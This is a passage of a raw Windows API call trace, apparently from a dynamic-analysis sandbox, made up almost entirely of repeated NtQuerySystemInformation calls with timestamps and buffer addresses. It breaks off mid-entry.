[0288.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0288.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0288.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0288.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.772] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d0f0 | out: lpSystemTimeAsFileTime=0xa78207d0f0*(dwLowDateTime=0x3975ddac, dwHighDateTime=0x1d6666a)) [0288.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0288.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0288.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff8, Length=0x50, ResultLength=0x0) [0288.772] GetTickCount () returned 0x1188386 [0288.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0288.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0288.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0288.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0288.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0288.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x28, ResultLength=0x0) [0288.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0288.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0288.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0288.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0288.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0288.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0288.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, 